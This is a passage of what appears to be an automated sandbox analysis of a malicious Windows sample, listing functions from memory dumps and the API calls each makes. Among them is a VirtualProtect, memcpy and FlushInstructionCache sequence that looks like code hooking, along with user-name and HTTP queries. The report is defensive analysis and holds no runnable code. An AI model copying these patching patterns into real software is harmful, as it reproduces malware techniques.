Part of subcall function 00FCEDAE: memcpy.MSVCRT ref: 00FCEDF9

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2CBBC, Relevance: 7.3, APIs: 4, Instructions: 139

APIs

Part of subcall function 00C2F1EF: memcmp.MSVCRT ref: 00C2F1FB

Part of subcall function 00C2F20B: memset.MSVCRT ref: 00C2F219
Part of subcall function 00C2F20B: memcpy.MSVCRT ref: 00C2F23A
Part of subcall function 00C2F20B: memcpy.MSVCRT ref: 00C2F260
Part of subcall function 00C2F20B: memcpy.MSVCRT ref: 00C2F284

TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,00C2D203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 00C2CC39

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2CCB3
EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2CCD2

Part of subcall function 00C2F0E1: memcmp.MSVCRT ref: 00C2F0FD

LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000), ref: 00C2CD20

Part of subcall function 00C2EEE2: memcpy.MSVCRT ref: 00C2EFC1
Part of subcall function 00C2EEE2: memcpy.MSVCRT ref: 00C2EFE2

Part of subcall function 00C4D95F: GetSystemTime.KERNEL32(?), ref: 00C4D969

Part of subcall function 00C2EDAE: memcpy.MSVCRT ref: 00C2EDF9

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD258C, Relevance: 7.3, APIs: 4, Instructions: 120

APIs

GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 00FD25BA
GetSystemTime.KERNEL32(?), ref: 00FD260D
CharLowerW.USER32(?), ref: 00FD265D
PathRenameExtensionW.SHLWAPI(?,?), ref: 00FD268D

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3258C, Relevance: 7.3, APIs: 4, Instructions: 120

APIs

GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 00C325BA
GetSystemTime.KERNEL32(?), ref: 00C3260D
CharLowerW.USER32(?), ref: 00C3265D
PathRenameExtensionW.SHLWAPI(?,?), ref: 00C3268D

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FF4D77, Relevance: 7.3, APIs: 4, Instructions: 111

APIs

Part of subcall function 00FF4B12: EnterCriticalSection.KERNEL32(01003510,01111E90,00FF4D87,?,01111E90), ref: 00FF4B22
Part of subcall function 00FF4B12: LeaveCriticalSection.KERNEL32(01003510,?,01111E90), ref: 00FF4B51

Part of subcall function 00FCD2F7: VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 00FCD315
Part of subcall function 00FCD2F7: VerQueryValueW.VERSION(?,?,?,?), ref: 00FCD382

GetCommandLineW.KERNEL32 ref: 00FF4E01
CommandLineToArgvW.SHELL32 ref: 00FF4E08
LocalFree.KERNEL32 ref: 00FF4E48

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

GetModuleHandleW.KERNEL32(?), ref: 00FF4E8A

Part of subcall function 00FF509F: PathFindFileNameW.SHLWAPI(00000000), ref: 00FF50E0

Part of subcall function 00FD7D68: InitializeCriticalSection.KERNEL32 ref: 00FD7D88

Part of subcall function 00FF3C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00FF3C98
Part of subcall function 00FF3C83: StrCmpIW.SHLWAPI(?,?), ref: 00FF3CA2

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C54D77, Relevance: 7.3, APIs: 4, Instructions: 111

APIs

Part of subcall function 00C54B12: EnterCriticalSection.KERNEL32(00C63510,00F41E90,00C54D87,?,00F41E90), ref: 00C54B22
Part of subcall function 00C54B12: LeaveCriticalSection.KERNEL32(00C63510,?,00F41E90), ref: 00C54B51

Part of subcall function 00C2D2F7: VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 00C2D315
Part of subcall function 00C2D2F7: VerQueryValueW.VERSION(?,?,?,?), ref: 00C2D382

GetCommandLineW.KERNEL32 ref: 00C54E01
CommandLineToArgvW.SHELL32 ref: 00C54E08
LocalFree.KERNEL32 ref: 00C54E48

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

GetModuleHandleW.KERNEL32(?), ref: 00C54E8A

Part of subcall function 00C5509F: PathFindFileNameW.SHLWAPI(00000000), ref: 00C550E0

Part of subcall function 00C37D68: InitializeCriticalSection.KERNEL32 ref: 00C37D88

Part of subcall function 00C53C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00C53C98
Part of subcall function 00C53C83: StrCmpIW.SHLWAPI(?,?), ref: 00C53CA2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FCC5FE, Relevance: 7.3, APIs: 4, Instructions: 104

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,00FCD203,?,?,00000000,?,?,?,?,00000000), ref: 00FCC631

Part of subcall function 00FED0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 00FED0B5

memcmp.MSVCRT ref: 00FCC67F

Part of subcall function 00FD32C5: memcpy.MSVCRT ref: 00FD32FB
Part of subcall function 00FD32C5: memcpy.MSVCRT ref: 00FD330F
Part of subcall function 00FD32C5: memset.MSVCRT ref: 00FD331D

SetEvent.KERNEL32 ref: 00FCC6C0

Part of subcall function 00FCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00FCF82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,00FCD203,?,?,00000000,?), ref: 00FCC6ED

Part of subcall function 00FF1E96: EnterCriticalSection.KERNEL32(?,?,?,?,00FCCAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00FF1E9C
Part of subcall function 00FF1E96: memcmp.MSVCRT ref: 00FF1EC8
Part of subcall function 00FF1E96: memcpy.MSVCRT ref: 00FF1F13
Part of subcall function 00FF1E96: LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00FF1F1F

Part of subcall function 00FCCBBC: TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,00FCD203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 00FCCC39
Part of subcall function 00FCCBBC: LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00FCD203,?,?,00000000,?), ref: 00FCCCB3
Part of subcall function 00FCCBBC: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00FCD203,?,?,00000000,?), ref: 00FCCCD2
Part of subcall function 00FCCBBC: LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,00FCD203,?,?,00000000), ref: 00FCCD20

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2C5FE, Relevance: 7.3, APIs: 4, Instructions: 104

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,00C2D203,?,?,00000000,?,?,?,?,00000000), ref: 00C2C631

Part of subcall function 00C4D0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 00C4D0B5

memcmp.MSVCRT ref: 00C2C67F

Part of subcall function 00C332C5: memcpy.MSVCRT ref: 00C332FB
Part of subcall function 00C332C5: memcpy.MSVCRT ref: 00C3330F
Part of subcall function 00C332C5: memset.MSVCRT ref: 00C3331D

SetEvent.KERNEL32 ref: 00C2C6C0

Part of subcall function 00C2F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00C2F82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2C6ED

Part of subcall function 00C51E96: EnterCriticalSection.KERNEL32(?,?,?,?,00C2CAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 00C51E9C
Part of subcall function 00C51E96: memcmp.MSVCRT ref: 00C51EC8
Part of subcall function 00C51E96: memcpy.MSVCRT ref: 00C51F13
Part of subcall function 00C51E96: LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 00C51F1F

Part of subcall function 00C2CBBC: TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,00C2D203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 00C2CC39
Part of subcall function 00C2CBBC: LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2CCB3
Part of subcall function 00C2CBBC: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000,?), ref: 00C2CCD2
Part of subcall function 00C2CBBC: LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,00C2D203,?,?,00000000), ref: 00C2CD20

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FEAF4A, Relevance: 7.3, APIs: 4, Instructions: 91

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,00FFF128), ref: 00FEAF7C
DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 00FEAF9C

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

Part of subcall function 00FE5C1C: memset.MSVCRT ref: 00FE5C5F

Part of subcall function 00FC9F72: memcpy.MSVCRT ref: 00FC9F80

Part of subcall function 00FCA150: memcpy.MSVCRT ref: 00FCA18C
Part of subcall function 00FCA150: memcpy.MSVCRT ref: 00FCA1A1
Part of subcall function 00FCA150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 00FCA1D3
Part of subcall function 00FCA150: memcpy.MSVCRT ref: 00FCA209
Part of subcall function 00FCA150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 00FCA239
Part of subcall function 00FCA150: memcpy.MSVCRT ref: 00FCA26F
Part of subcall function 00FCA150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 00FCA29F

memset.MSVCRT ref: 00FEB039
memcpy.MSVCRT ref: 00FEB04B

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4AF4A, Relevance: 7.3, APIs: 4, Instructions: 91

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,00C5F128), ref: 00C4AF7C
DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 00C4AF9C

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

Part of subcall function 00C45C1C: memset.MSVCRT ref: 00C45C5F

Part of subcall function 00C29F72: memcpy.MSVCRT ref: 00C29F80

Part of subcall function 00C2A150: memcpy.MSVCRT ref: 00C2A18C
Part of subcall function 00C2A150: memcpy.MSVCRT ref: 00C2A1A1
Part of subcall function 00C2A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 00C2A1D3
Part of subcall function 00C2A150: memcpy.MSVCRT ref: 00C2A209
Part of subcall function 00C2A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 00C2A239
Part of subcall function 00C2A150: memcpy.MSVCRT ref: 00C2A26F
Part of subcall function 00C2A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 00C2A29F

memset.MSVCRT ref: 00C4B039
memcpy.MSVCRT ref: 00C4B04B

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD1905, Relevance: 7.2, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(01111E90,00000000,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD1913

Part of subcall function 00FD3764: GetModuleHandleW.KERNEL32(?), ref: 00FD3780
Part of subcall function 00FD3764: GetModuleHandleW.KERNEL32(?), ref: 00FD37BB

GetFileVersionInfoSizeW.VERSION(01111EF0,?,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD1933
GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD1953

Part of subcall function 00FF4D77: GetCommandLineW.KERNEL32 ref: 00FF4E01
Part of subcall function 00FF4D77: CommandLineToArgvW.SHELL32 ref: 00FF4E08
Part of subcall function 00FF4D77: LocalFree.KERNEL32 ref: 00FF4E48
Part of subcall function 00FF4D77: GetModuleHandleW.KERNEL32(?), ref: 00FF4E8A

Part of subcall function 00FCBBAD: VerQueryValueW.VERSION(?,00FC75E4,?,?,01111E90,?,00FD1983,?,?,?,?,?,?,00FE48EB), ref: 00FCBBCE
Part of subcall function 00FCBBAD: GetModuleHandleW.KERNEL32(?), ref: 00FCBC0F

Part of subcall function 00FDD8C0: GetModuleHandleW.KERNEL32(?), ref: 00FDD8DD

Part of subcall function 00FCE2C1: EnterCriticalSection.KERNEL32(01003510,01111E90,00FD198D,?,?,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FCE2D1
Part of subcall function 00FCE2C1: LeaveCriticalSection.KERNEL32(01003510,?,?,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FCE2F9

Part of subcall function 00FCD987: InitializeCriticalSection.KERNEL32 ref: 00FCD9B5
Part of subcall function 00FCD987: GetModuleHandleW.KERNEL32(?), ref: 00FCDA1C

Part of subcall function 00FCE209: InitializeCriticalSection.KERNEL32 ref: 00FCE21E

Part of subcall function 00FD599B: EnterCriticalSection.KERNEL32(010027DC,00000000,00FCD9CE,01111E90,?,?,?,00FD1992,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD59A7
Part of subcall function 00FD599B: LeaveCriticalSection.KERNEL32(010027DC,?,?,?,00FD1992,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD59B7

Part of subcall function 00FD59C5: LeaveCriticalSection.KERNEL32(010027DC,00FD5A45,00000002,?,?,?,00FCDAA2,00000002,00000001,000000FF), ref: 00FD59CF

Part of subcall function 00FD59D6: LeaveCriticalSection.KERNEL32(010027DC,?,00FCD9F7,00000009,01111E90,?,?,?,00FD1992,?,?,?,?,00FE48EB), ref: 00FD59E3

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

LeaveCriticalSection.KERNEL32(01111E90,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD19D2

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C31905, Relevance: 7.2, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(00F41E90,00000000,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31913

Part of subcall function 00C33764: GetModuleHandleW.KERNEL32(?), ref: 00C33780
Part of subcall function 00C33764: GetModuleHandleW.KERNEL32(?), ref: 00C337BB

GetFileVersionInfoSizeW.VERSION(00F41EF0,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31933
GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C31953

Part of subcall function 00C54D77: GetCommandLineW.KERNEL32 ref: 00C54E01
Part of subcall function 00C54D77: CommandLineToArgvW.SHELL32 ref: 00C54E08
Part of subcall function 00C54D77: LocalFree.KERNEL32 ref: 00C54E48
Part of subcall function 00C54D77: GetModuleHandleW.KERNEL32(?), ref: 00C54E8A

Part of subcall function 00C2BBAD: VerQueryValueW.VERSION(?,00C275E4,?,?,00F41E90,?,00C31983,?,?,?,?,?,?,00C448EB), ref: 00C2BBCE
Part of subcall function 00C2BBAD: GetModuleHandleW.KERNEL32(?), ref: 00C2BC0F

Part of subcall function 00C3D8C0: GetModuleHandleW.KERNEL32(?), ref: 00C3D8DD

Part of subcall function 00C2E2C1: EnterCriticalSection.KERNEL32(00C63510,00F41E90,00C3198D,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C2E2D1
Part of subcall function 00C2E2C1: LeaveCriticalSection.KERNEL32(00C63510,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C2E2F9

Part of subcall function 00C2D987: InitializeCriticalSection.KERNEL32 ref: 00C2D9B5
Part of subcall function 00C2D987: GetModuleHandleW.KERNEL32(?), ref: 00C2DA1C

Part of subcall function 00C2E209: InitializeCriticalSection.KERNEL32 ref: 00C2E21E

Part of subcall function 00C3599B: EnterCriticalSection.KERNEL32(00C627DC,00000000,00C2D9CE,00F41E90,?,?,?,00C31992,?,?,?,?,00C448EB,?,?,00000000), ref: 00C359A7
Part of subcall function 00C3599B: LeaveCriticalSection.KERNEL32(00C627DC,?,?,?,00C31992,?,?,?,?,00C448EB,?,?,00000000), ref: 00C359B7

Part of subcall function 00C359C5: LeaveCriticalSection.KERNEL32(00C627DC,00C35A45,00000002,?,?,?,00C2DAA2,00000002,00000001,000000FF), ref: 00C359CF

Part of subcall function 00C359D6: LeaveCriticalSection.KERNEL32(00C627DC,?,00C2D9F7,00000009,00F41E90,?,?,?,00C31992,?,?,?,?,00C448EB), ref: 00C359E3

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

LeaveCriticalSection.KERNEL32(00F41E90,?,?,?,?,00C448EB,?,?,00000000), ref: 00C319D2

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD19E0, Relevance: 7.2, APIs: 4, Instructions: 70

APIs

EnterCriticalSection.KERNEL32(01111E90), ref: 00FD19EE

Part of subcall function 00FD353D: EnterCriticalSection.KERNEL32(01003510,01111E90,00FD376F,?,?,?,?,?,00FD191E,?,?,?,?,00FE48EB), ref: 00FD354D
Part of subcall function 00FD353D: LeaveCriticalSection.KERNEL32(01003510,?,?,?,?,?,00FD191E,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FD3575

PathFindFileNameW.SHLWAPI(?), ref: 00FD1A21

Part of subcall function 00FD357D: VirtualProtect.KERNEL32(?,00FD37D4,00000080,?), ref: 00FD35ED
Part of subcall function 00FD357D: GetCurrentThread.KERNEL32 ref: 00FD36AC
Part of subcall function 00FD357D: GetThreadPriority.KERNEL32 ref: 00FD36B5
Part of subcall function 00FD357D: SetThreadPriority.KERNEL32(?,0000000F), ref: 00FD36C6
Part of subcall function 00FD357D: Sleep.KERNEL32(00000000), ref: 00FD36CA
Part of subcall function 00FD357D: memcpy.MSVCRT ref: 00FD36D9
Part of subcall function 00FD357D: FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00FD36EA
Part of subcall function 00FD357D: SetThreadPriority.KERNEL32 ref: 00FD36F2
Part of subcall function 00FD357D: GetTickCount.KERNEL32 ref: 00FD370D
Part of subcall function 00FD357D: GetTickCount.KERNEL32 ref: 00FD371A
Part of subcall function 00FD357D: Sleep.KERNEL32(00000000), ref: 00FD3727
Part of subcall function 00FD357D: VirtualProtect.KERNEL32(?,00FD37D4,00000000,?), ref: 00FD3756

Part of subcall function 00FF509F: PathFindFileNameW.SHLWAPI(00000000), ref: 00FF50E0

LeaveCriticalSection.KERNEL32(01111E90), ref: 00FD1A9E

Part of subcall function 00FCBC27: PathFindFileNameW.SHLWAPI(00000000), ref: 00FCBC6B

Part of subcall function 00FDBE32: EnterCriticalSection.KERNEL32(01003510,01111E90,00FDD8CC,?,00FD1988,?,?,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FDBE42
Part of subcall function 00FDBE32: LeaveCriticalSection.KERNEL32(01003510,?,00FD1988,?,?,?,?,?,?,00FE48EB,?,?,00000000), ref: 00FDBE71

PathFindFileNameW.SHLWAPI(?), ref: 00FD1A64

Part of subcall function 00FF3C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00FF3C98
Part of subcall function 00FF3C83: StrCmpIW.SHLWAPI(?,?), ref: 00FF3CA2

Part of subcall function 00FCDA34: PathFindFileNameW.SHLWAPI(?), ref: 00FCDA53
Part of subcall function 00FCDA34: PathRemoveExtensionW.SHLWAPI(?), ref: 00FCDA7C

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C319E0, Relevance: 7.2, APIs: 4, Instructions: 70

APIs

EnterCriticalSection.KERNEL32(00F41E90), ref: 00C319EE

Part of subcall function 00C3353D: EnterCriticalSection.KERNEL32(00C63510,00F41E90,00C3376F,?,?,?,?,?,00C3191E,?,?,?,?,00C448EB), ref: 00C3354D
Part of subcall function 00C3353D: LeaveCriticalSection.KERNEL32(00C63510,?,?,?,?,?,00C3191E,?,?,?,?,00C448EB,?,?,00000000), ref: 00C33575

PathFindFileNameW.SHLWAPI(?), ref: 00C31A21

Part of subcall function 00C3357D: VirtualProtect.KERNEL32(?,00C337D4,00000080,?), ref: 00C335ED
Part of subcall function 00C3357D: GetCurrentThread.KERNEL32 ref: 00C336AC
Part of subcall function 00C3357D: GetThreadPriority.KERNEL32 ref: 00C336B5
Part of subcall function 00C3357D: SetThreadPriority.KERNEL32(?,0000000F), ref: 00C336C6
Part of subcall function 00C3357D: Sleep.KERNEL32(00000000), ref: 00C336CA
Part of subcall function 00C3357D: memcpy.MSVCRT ref: 00C336D9
Part of subcall function 00C3357D: FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00C336EA
Part of subcall function 00C3357D: SetThreadPriority.KERNEL32 ref: 00C336F2
Part of subcall function 00C3357D: GetTickCount.KERNEL32 ref: 00C3370D
Part of subcall function 00C3357D: GetTickCount.KERNEL32 ref: 00C3371A
Part of subcall function 00C3357D: Sleep.KERNEL32(00000000), ref: 00C33727
Part of subcall function 00C3357D: VirtualProtect.KERNEL32(?,00C337D4,00000000,?), ref: 00C33756

Part of subcall function 00C5509F: PathFindFileNameW.SHLWAPI(00000000), ref: 00C550E0

LeaveCriticalSection.KERNEL32(00F41E90), ref: 00C31A9E

Part of subcall function 00C2BC27: PathFindFileNameW.SHLWAPI(00000000), ref: 00C2BC6B

Part of subcall function 00C3BE32: EnterCriticalSection.KERNEL32(00C63510,00F41E90,00C3D8CC,?,00C31988,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C3BE42
Part of subcall function 00C3BE32: LeaveCriticalSection.KERNEL32(00C63510,?,00C31988,?,?,?,?,?,?,00C448EB,?,?,00000000), ref: 00C3BE71

PathFindFileNameW.SHLWAPI(?), ref: 00C31A64

Part of subcall function 00C53C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00C53C98
Part of subcall function 00C53C83: StrCmpIW.SHLWAPI(?,?), ref: 00C53CA2

Part of subcall function 00C2DA34: PathFindFileNameW.SHLWAPI(?), ref: 00C2DA53
Part of subcall function 00C2DA34: PathRemoveExtensionW.SHLWAPI(?), ref: 00C2DA7C

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD9346, Relevance: 7.2, APIs: 4, Instructions: 65

APIs

HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 00FD9375
GetLastError.KERNEL32(?,00000000,3D94878D,00000000,3D94878D,00FED67C,?,?,?,?,?,00FC7900,?,?,?), ref: 00FD937B

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

memcpy.MSVCRT ref: 00FD93A6
HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 00FD93BF

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C39346, Relevance: 7.2, APIs: 4, Instructions: 65

APIs

HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 00C39375
GetLastError.KERNEL32(?,00000000,3D94878D,00000000,3D94878D,00C4D67C,?,?,?,?,?,00C27900,?,?,?), ref: 00C3937B

Part of subcall function 00C369B0: HeapAlloc.KERNEL32(00000008,?,?,00C3519B,?,?,?,?,00C446A1,?,00C449A5,?,?,00000001), ref: 00C369C1

memcpy.MSVCRT ref: 00C393A6
HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 00C393BF

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FED0DA, Relevance: 7.2, APIs: 4, Instructions: 61

APIs

Part of subcall function 00FF046D: EnterCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF047A
Part of subcall function 00FF046D: LeaveCriticalSection.KERNEL32(010030F4,?,?,00FCE3BD,00000000,?,?,00000001), ref: 00FF0488

QueryPerformanceCounter.KERNEL32(?), ref: 00FED0F9
GetTickCount.KERNEL32 ref: 00FED106

Part of subcall function 00FCF1A8: EnterCriticalSection.KERNEL32(01003510,?,00FCC78E,?,?,?,00000001,00FE4DE8,00000001), ref: 00FCF1B8
Part of subcall function 00FCF1A8: LeaveCriticalSection.KERNEL32(01003510,?,00FCC78E,?,?,?,00000001,00FE4DE8,00000001), ref: 00FCF1E2

Part of subcall function 00FC9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00FC9ACA
Part of subcall function 00FC9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00FC9AEF

memset.MSVCRT ref: 00FED15A
memcpy.MSVCRT ref: 00FED16A

Part of subcall function 00FC9A2A: CryptDestroyHash.ADVAPI32 ref: 00FC9A42
Part of subcall function 00FC9A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00FC9A53

Part of subcall function 00FC9B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00FC9B41

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C4D0DA, Relevance: 7.2, APIs: 4, Instructions: 61

APIs

Part of subcall function 00C5046D: EnterCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C5047A
Part of subcall function 00C5046D: LeaveCriticalSection.KERNEL32(00C630F4,?,?,00C2E3BD,00000000,?,?,00000001), ref: 00C50488

QueryPerformanceCounter.KERNEL32(?), ref: 00C4D0F9
GetTickCount.KERNEL32 ref: 00C4D106

Part of subcall function 00C2F1A8: EnterCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1B8
Part of subcall function 00C2F1A8: LeaveCriticalSection.KERNEL32(00C63510,?,00C2C78E,?,?,?,00000001,00C44DE8,00000001), ref: 00C2F1E2

Part of subcall function 00C29A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00C29ACA
Part of subcall function 00C29A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00C29AEF

memset.MSVCRT ref: 00C4D15A
memcpy.MSVCRT ref: 00C4D16A

Part of subcall function 00C29A2A: CryptDestroyHash.ADVAPI32 ref: 00C29A42
Part of subcall function 00C29A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00C29A53

Part of subcall function 00C29B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00C29B41

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE4461, Relevance: 7.2, APIs: 4, Instructions: 56

APIs

PathSkipRootW.SHLWAPI(?), ref: 00FE448B
GetFileAttributesW.KERNEL32(?), ref: 00FE44B8
